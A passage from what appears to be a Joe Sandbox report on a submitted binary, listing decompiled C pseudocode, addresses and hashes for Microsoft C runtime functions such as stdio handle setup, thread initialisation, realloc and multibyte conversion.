						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0xd84848; // 0x13143d8
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0xd84848;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0xd86100;
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91);
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -14174268
											E00D740A2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E00D73B53();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E00D72445(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0xd850e4 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E00D74869(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0xd84848[_t149] = _t138;
							 *0xd850e4 =  *0xd850e4 + _t141;
							__eflags =  *0xd850e4;
							while(1) {
								__eflags = _t138 - 0x800 + 0xd84848[_t149];
								if(_t138 >= 0x800 + 0xd84848[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0xd850e4; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0xd84848[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E00D740A2(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E00D72600(_t155, 0xd83400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                        0x00d738a8
                        0x00d738aa
                        0x00d738af
                        0x00d738b6
                        0x00d738be
                        0x00d738c1
                        0x00d738c5
                        0x00d738c6
                        0x00d738c7
                        0x00d738ce
                        0x00d738d0
                        0x00d738d5
                        0x00d738f2
                        0x00d738f7
                        0x00d738fd
                        0x00d73902
                        0x00d73904
                        0x00000000
                        0x00000000
                        0x00d73906
                        0x00d7390c
                        0x00d7390f
                        0x00d73912
                        0x00d7391b
                        0x00d7391e
                        0x00d73924
                        0x00d73927
                        0x00d7392a
                        0x00d7392d
                        0x00d73930
                        0x00d73930
                        0x00d7393b
                        0x00d73941
                        0x00d73946
                        0x00d73a7b
                        0x00d73a7d
                        0x00d73a7e
                        0x00d73a7e
                        0x00d73a7e
                        0x00d73a80
                        0x00d73a80
                        0x00d73a83
                        0x00d73a86
                        0x00000000
                        0x00000000
                        0x00d73a91
                        0x00d73a97
                        0x00d73a9a
                        0x00d73a9d
                        0x00d73ab1
                        0x00d73ab1
                        0x00d73ab5
                        0x00d73ab7
                        0x00d73abe
                        0x00d73ac3
                        0x00d73ac5
                        0x00d73ac5
                        0x00d73ab9
                        0x00d73abb
                        0x00d73abb
                        0x00d73ac9
                        0x00d73acf
                        0x00d73ad2
                        0x00d73ad5
                        0x00d73b23
                        0x00d73b29
                        0x00d73b2c
                        0x00d73b2e
                        0x00d73b33
                        0x00d73b35
                        0x00d73b3a
                        0x00d73b3a
                        0x00000000
                        0x00d73ad7
                        0x00d73ad7
                        0x00d73ad9
                        0x00000000
                        0x00000000
                        0x00d73adc
                        0x00d73ae2
                        0x00d73ae4
                        0x00000000
                        0x00000000
                        0x00d73ae9
                        0x00d73aeb
                        0x00d73af0
                        0x00d73af3
                        0x00d73afd
                        0x00d73b00
                        0x00d73b0b
                        0x00d73b12
                        0x00d73b16
                        0x00d73b1b
                        0x00d73b1e
                        0x00d73b3d
                        0x00d73b3d
                        0x00000000
                        0x00d73b3d
                        0x00d73b06
                        0x00d73b06
                        0x00d73b08
                        0x00d73b08
                        0x00000000
                        0x00d73b08
                        0x00d73af9
                        0x00000000
                        0x00d73af9
                        0x00d73ad5
                        0x00d73a9f
                        0x00d73aa1
                        0x00000000
                        0x00000000
                        0x00d73aa9
                        0x00000000
                        0x00d73aa9
                        0x00d73b43
                        0x00d73b46
                        0x00d73b4b
                        0x00d73b4b
                        0x00d73b4d
                        0x00d73b52
                        0x00d73b52
                        0x00d7394c
                        0x00d7394f
                        0x00d73951
                        0x00000000
                        0x00000000
                        0x00d73957
                        0x00d73959
                        0x00d7395c
                        0x00d7395f
                        0x00d73964
                        0x00d7396c
                        0x00d7396e
                        0x00d73970
                        0x00d73972
                        0x00d73972
                        0x00d73977
                        0x00d73977
                        0x00d73978
                        0x00d7397b
                        0x00d7397b
                        0x00d73981
                        0x00000000
                        0x00000000
                        0x00d7398d
                        0x00d7398f
                        0x00d73992
                        0x00d73994
                        0x00d73a2e
                        0x00d73a35
                        0x00d73a35
                        0x00d73a3b
                        0x00d73a47
                        0x00d73a49
                        0x00000000
                        0x00000000
                        0x00d73a4b
                        0x00d73a51
                        0x00d73a54
                        0x00d73a57
                        0x00d73a5b
                        0x00d73a61
                        0x00d73a64
                        0x00d73a67
                        0x00d73a6a
                        0x00d73a6a
                        0x00d73a6f
                        0x00d73a70
                        0x00d73a73
                        0x00000000
                        0x00d73a73
                        0x00d7399a
                        0x00d739a0
                        0x00000000
                        0x00d739a0
                        0x00d739a3
                        0x00d739a5
                        0x00d739aa
                        0x00d739ab
                        0x00d739ae
                        0x00d739b1
                        0x00d739b1
                        0x00d739b3
                        0x00000000
                        0x00000000
                        0x00d739b9
                        0x00d739bb
                        0x00d739be
                        0x00d73a1b
                        0x00d73a1b
                        0x00d73a1c
                        0x00d73a22
                        0x00d73a23
                        0x00d73a26
                        0x00d73a29
                        0x00000000
                        0x00d73a29
                        0x00d739c0
                        0x00d739c2
                        0x00000000
                        0x00000000
                        0x00d739c4
                        0x00d739c6
                        0x00d739c8
                        0x00000000
                        0x00000000
                        0x00d739ca
                        0x00d739cc
                        0x00d739dc
                        0x00d739e9
                        0x00d739f0
                        0x00d739f5
                        0x00d739fc
                        0x00d73a06
                        0x00d73a0a
                        0x00d73a0f
                        0x00d73a12
                        0x00d73a12
                        0x00d73a12
                        0x00d73a15
                        0x00d73a18
                        0x00d73a18
                        0x00000000
                        0x00d73a18
                        0x00d739cf
                        0x00d739d5
                        0x00d739d8
                        0x00d739da
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00d739da
                        0x00000000
                        0x00d739b1
                        0x00d738ea
                        0x00000000

                        APIs
                        • __lock.LIBCMT ref: 00D738B6
                          • Part of subcall function 00D7442F: __mtinitlocknum.LIBCMT ref: 00D74441
                          • Part of subcall function 00D7442F: EnterCriticalSection.KERNEL32(00000000,?,00D737AB,0000000D), ref: 00D7445A
                        • __calloc_crt.LIBCMT ref: 00D738C7
                          • Part of subcall function 00D74869: __calloc_impl.LIBCMT ref: 00D74878
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D738E2
                        • GetStartupInfoW.KERNEL32(?,00D82260,00000064,00D71654,00D82190,00000014), ref: 00D7393B
                        • __calloc_crt.LIBCMT ref: 00D73986
                        • GetFileType.KERNEL32(00000001), ref: 00D739CF
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 2772871689-0
                        • Opcode ID: eedce8d412bb233e26a2a556420ff0ae670e97df73ef385219ec3b4d94f6f218
                        • Instruction ID: 3b9319270afad973bf9a4d6e91ec7af8224983e9556176e32cd70dba36fc4022
                        • Opcode Fuzzy Hash: eedce8d412bb233e26a2a556420ff0ae670e97df73ef385219ec3b4d94f6f218
                        • Instruction Fuzzy Hash: FD81B2719043458FDB14CF68C8416A9BBF0EF19324B28826ED4AAEB391E734D942DB74
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D73815 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E00D73815(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00D71890(_t3);
				if(E00D74560() != 0) {
					_t6 = E00D74001(E00D735A6);
					 *0xd8350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00D74869(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00D7388B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00D7405D( *0xd8350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00D73762(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00D7388B();
					return 0;
				}
			}








                        0x00d73815
                        0x00d73821
                        0x00d73830
                        0x00d73835
                        0x00d7383b
                        0x00d7383e
                        0x00000000
                        0x00d73840
                        0x00d7384d
                        0x00d73851
                        0x00d73853
                        0x00d73882
                        0x00d73882
                        0x00d73887
                        0x00d7388a
                        0x00d73855
                        0x00d73863
                        0x00d73865
                        0x00000000
                        0x00d73867
                        0x00d73867
                        0x00d73869
                        0x00d7386a
                        0x00d73871
                        0x00d73877
                        0x00d7387b
                        0x00d7387f
                        0x00d73881
                        0x00d73881
                        0x00d73865
                        0x00d73853
                        0x00d73823
                        0x00d73823
                        0x00d73823
                        0x00d7382a
                        0x00d7382a

                        APIs
                        • __init_pointers.LIBCMT ref: 00D73815
                          • Part of subcall function 00D71890: RtlEncodePointer.NTDLL(00000000,?,00D7381A,00D7163A,00D82190,00000014), ref: 00D71893
                          • Part of subcall function 00D71890: __initp_misc_winsig.LIBCMT ref: 00D718AE
                          • Part of subcall function 00D71890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D74117
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D7412B
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D7413E
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D74151
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D74164
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D74177
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00D7418A
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D7419D
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D741B0
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D741C3
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D741D6
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D741E9
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D741FC
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D7420F
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D74222
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D74235
                        • __mtinitlocks.LIBCMT ref: 00D7381A
                        • __mtterm.LIBCMT ref: 00D73823
                          • Part of subcall function 00D7388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00D73828,00D7163A,00D82190,00000014), ref: 00D7447A
                          • Part of subcall function 00D7388B: _free.LIBCMT ref: 00D74481
                          • Part of subcall function 00D7388B: DeleteCriticalSection.KERNEL32(00D83558,?,?,00D73828,00D7163A,00D82190,00000014), ref: 00D744A3
                        • __calloc_crt.LIBCMT ref: 00D73848
                        • __initptd.LIBCMT ref: 00D7386A
                        • GetCurrentThreadId.KERNEL32 ref: 00D73871
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                        • String ID:
                        • API String ID: 3567560977-0
                        • Opcode ID: 278c1f0dd0e93df5de4385ab4f058799a2bc60290f049d1f0ed56eec90eb9c6f
                        • Instruction ID: 162fec928960f12b415d3688e2dbec891a10202e2c4c5d94db79b42cea7b531f
                        • Opcode Fuzzy Hash: 278c1f0dd0e93df5de4385ab4f058799a2bc60290f049d1f0ed56eec90eb9c6f
                        • Instruction Fuzzy Hash: B9F096325193215EE32977787C1368A2A84CF01B30B24C76DF46CD81D2FF218A4156B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D77452 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E00D77452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0xd84834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0xd84830 == _t7) {
									_t9 = E00D71CC3();
									 *_t9 = E00D71CD6(GetLastError());
									goto L17;
								} else {
									if(E00D71741(_t7, _t31) == 0) {
										_t12 = E00D71CC3();
										 *_t12 = E00D71CD6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00D71741(_t6, _t31);
						 *((intOrPtr*)(E00D71CC3())) = 0xc;
						goto L12;
					} else {
						E00D74831(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00D7113F(__ebx, __edx, __edi, _a8);
				}
			}









                        0x00d77459
                        0x00d77467
                        0x00d7746c
                        0x00d7747b
                        0x00d774ae
                        0x00d77480
                        0x00d77482
                        0x00d77482
                        0x00d7748f
                        0x00d77495
                        0x00d77499
                        0x00d774f9
                        0x00d774f9
                        0x00d7749b
                        0x00d774a1
                        0x00d774e3
                        0x00d774f7
                        0x00000000
                        0x00d774a3
                        0x00d774ac
                        0x00d774cb
                        0x00d774df
                        0x00d774c5
                        0x00d774c5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00d774ac
                        0x00d774a1
                        0x00000000
                        0x00d774c7
                        0x00d774b4
                        0x00d774bf
                        0x00000000
                        0x00d7746e
                        0x00d77471
                        0x00d77477
                        0x00d77477
                        0x00d774c8
                        0x00d774ca
                        0x00d7745b
                        0x00d77465
                        0x00d77465

                        APIs
                        • _malloc.LIBCMT ref: 00D7745E
                          • Part of subcall function 00D7113F: __FF_MSGBANNER.LIBCMT ref: 00D71156
                          • Part of subcall function 00D7113F: __NMSG_WRITE.LIBCMT ref: 00D7115D
                          • Part of subcall function 00D7113F: RtlAllocateHeap.NTDLL(012F0000,00000000,00000001,00000000,00000000,00000000,?,00D748C7,00000000,00000000,00000000,00000000,?,00D744F9,00000018,00D82280), ref: 00D71182
                        • _free.LIBCMT ref: 00D77471
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: AllocateHeap_free_malloc
                        • String ID:
                        • API String ID: 1020059152-0
                        • Opcode ID: 6e49eccdde4053e6220a60cdde84c36078fee1608ba10d277d21da59e4882402
                        • Instruction ID: c5849b6f846d88d016a79cef9a64116457cb18d21cf60a451bec5e216a458715
                        • Opcode Fuzzy Hash: 6e49eccdde4053e6220a60cdde84c36078fee1608ba10d277d21da59e4882402
                        • Instruction Fuzzy Hash: 52117731909625ABCB213FB8AC456597FD4EF04368B24CE2AF94CDA351FA70884086B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D791C6 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00D791C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00D74BFC( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00D7917B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00D71CC3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                        0x00d791ce
                        0x00d791d3
                        0x00d791ed
                        0x00000000
                        0x00d791ed
                        0x00d791d5
                        0x00d791da
                        0x00000000
                        0x00000000
                        0x00d791df
                        0x00d791fc
                        0x00d79201
                        0x00d79204
                        0x00d7920b
                        0x00d7922a
                        0x00d79231
                        0x00d79233
                        0x00d79277
                        0x00d79283
                        0x00d79286
                        0x00d7928b
                        0x00d7928e
                        0x00d79294
                        0x00d79296
                        0x00d792a6
                        0x00d792a6
                        0x00d792aa
                        0x00d792ac
                        0x00d792af
                        0x00d792af
                        0x00d792af
                        0x00d792af
                        0x00000000
                        0x00d792b5
                        0x00d79298
                        0x00d79298
                        0x00d7929d
                        0x00d7929d
                        0x00d792a0
                        0x00000000
                        0x00d792a0
                        0x00d79235
                        0x00d79238
                        0x00d7923c
                        0x00d79265
                        0x00d79265
                        0x00d79265
                        0x00d79268
                        0x00d79268
                        0x00000000
                        0x00000000
                        0x00d7926a
                        0x00d7926e
                        0x00000000
                        0x00000000
                        0x00d79270
                        0x00d79270
                        0x00d79270
                        0x00000000
                        0x00d79270
                        0x00d7923e
                        0x00d7923e
                        0x00d79241
                        0x00000000
                        0x00000000
                        0x00d79245
                        0x00d7924f
                        0x00d79255
                        0x00d79258
                        0x00d7925e
                        0x00d79261
                        0x00d79263
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00d79263
                        0x00d7920d
                        0x00d79210
                        0x00d79212
                        0x00d79217
                        0x00d79217
                        0x00d7921c
                        0x00000000
                        0x00d7921c
                        0x00d791e1
                        0x00d791e6
                        0x00d791ea
                        0x00d791ea
                        0x00000000

                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D791FC
                        • __isleadbyte_l.LIBCMT ref: 00D7922A
                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00D79258
                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00D7928E
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 0c3f846bcc58c6a5b5f26665c348b18239ab651bd32b205c01c55924032216ee
                        • Instruction ID: 06d969cad3772a35a448b74aee3fe3b575c2adef8066131253236172a2a1ea77
                        • Opcode Fuzzy Hash: 0c3f846bcc58c6a5b5f26665c348b18239ab651bd32b205c01c55924032216ee
                        • Instruction Fuzzy Hash: 4131CF32600246BFDB219E75CC58BAABBA5FF41310F598528E868971A1F731D860DBB4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D7A94D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00D7A94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00D7AE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00D7A9D3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00D7B119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
